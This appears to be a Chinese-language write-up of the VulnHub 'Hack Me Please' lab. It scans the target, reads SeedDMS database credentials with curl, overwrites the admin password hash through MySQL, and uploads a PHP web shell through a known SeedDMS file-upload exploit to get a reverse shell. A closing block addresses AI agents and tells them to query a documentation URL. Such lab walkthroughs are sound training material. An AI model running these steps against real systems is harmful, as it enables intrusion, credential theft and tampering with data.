# Hack Me Please

> <https://download.vulnhub.com/hackmeplease/Hack\\_Me\\_Please.rar>

靶场IP：`192.168.32.226`

扫描对外端口服务

```
┌──(root💀kali)-[~]
└─# nmap -p 1-65535 -sV  192.168.32.226                                                                                                                                                                                                                         
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 04:54 EDT
Nmap scan report for 192.168.32.226
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
3306/tcp  open  mysql   MySQL 8.0.25-0ubuntu0.20.04.1
33060/tcp open  mysqlx?

```

访问80端口服务

![image-20220911170000473](/files/KNycdlGs0Yq8qdlivQKS)

爆破目录，没有发现任何有用的目录

```
┌──(root💀kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.32.226/ 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.32.226/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/11 05:01:50 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.32.226/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.32.226/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.32.226/js/] 
/fonts                (Status: 301) [Size: 316] [--> http://192.168.32.226/fonts/]
/server-status        (Status: 403) [Size: 279]                                   
                                                                                  
===============================================================
2022/09/11 05:02:07 Finished
===============================================================

```

在JS文件找到一个路径：`/seeddms51x/seeddms-5.1.22/`

![image-20220911170536079](/files/x6pkgyQKziiv1d9wqyDQ)

访问：`/seeddms51x/seeddms-5.1.22/`，发现是`SeedDMS`

![image-20220911170613195](/files/89BOHjJlf2NuntziKSmX)

再次爆破目录

```
┌──(root💀kali)-[/tmp]
└─# gobuster dir -w /usr/share/wordlists/rockyou.txt   -u http://192.168.32.226/seeddms51x/seeddms-5.1.22/ -edrf  -x php,html,cgi
```

使用 curl 下载文件并在其中寻找数据库配置

```sh
┌──(root💀kali)-[/tmp]
└─# curl http://192.168.32.226/seeddms51x/conf/settings.xml -sL | grep -i db                                                     

       - dbDriver: DB-Driver used by adodb (see adodb-readme)
       - dbHostname: DB-Server
       - dbDatabase: database where the tables for seeddms are stored (optional - see adodb-readme)
       - dbUser: username for database-access
       - dbPass: password for database-access
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false">
       - extraPath: Path to addtional software. This is the directory containing additional software like the adodb directory, or the pear Log package. This path will be added to the php include path

```

使用上述步骤中的凭据登录 MySQL

```
mysql -u seeddms -pseeddms -D seeddms --silent -h 192.168.32.226
```

在那里，我发现了两个表，其中包含**用户**字符串 `users`和`tblUsers`. 由于我无法破解密码，所以我更新了管理员用户的密码

![image-20220911171430692](/files/c2QVQLNFH44uyubRr4Gq)

使用**admin:test**凭据以管理员身份成功登录应用程序

```
-- md5("test") = d8e8fca2dc0f896fd7cb4cb0031ba249
UPDATE tblUsers set pwd='098f6bcd4621d373cade4e832627b4f6' where login='admin';
```

![image-20220911171901787](/files/sYaG2nl84ljNSw3JHsHo)

在搜索漏洞利用时，我发现这个应用程序的当前版本容易被任意文件上传。这是一个好的开始，我可以上传我的 web shell 并获得反向 Meterpreter

> <https://www.exploit-db.com/exploits/47022>

首先，我们必须通过导航到"添加文档"菜单来上传 shell。接下来，我们必须浏览 PHP 文件并上传它。这会给我们一个空白页。但是，返回仪表板后，我们会看到一个文件已经上传。

![image-20220911172238333](/files/PLZ6dpx9yFI78dapLLKO)

![image-20220911172349781](/files/yW8csA66IiQOaHhj7vx6)

访问反弹shell：`http://192.168.32.226/seeddms51x/data/1048576/4/1.php`

![image-20220911172639310](/files/4TLizDVKympfoqwIvnK1)

查看密码文件

![image-20220911172705555](/files/reYbEZR5GcYjphvQ7OUB)

我们已经从数据库中获得了`saket`用户的密码。

```
MySQL [seeddms]> select * from users;
Employee_id     Employee_first_name     Employee_last_name      Employee_passwd
1       saket   saurav  Saket@#$1337
```

![image-20230208145813634](/files/LfGYGZV7tisWXLYRIiIy)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://icybersec.gitbook.io/cybersecuritynote/ba-chang-huan-jing/vulnhub/hack-me-please.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.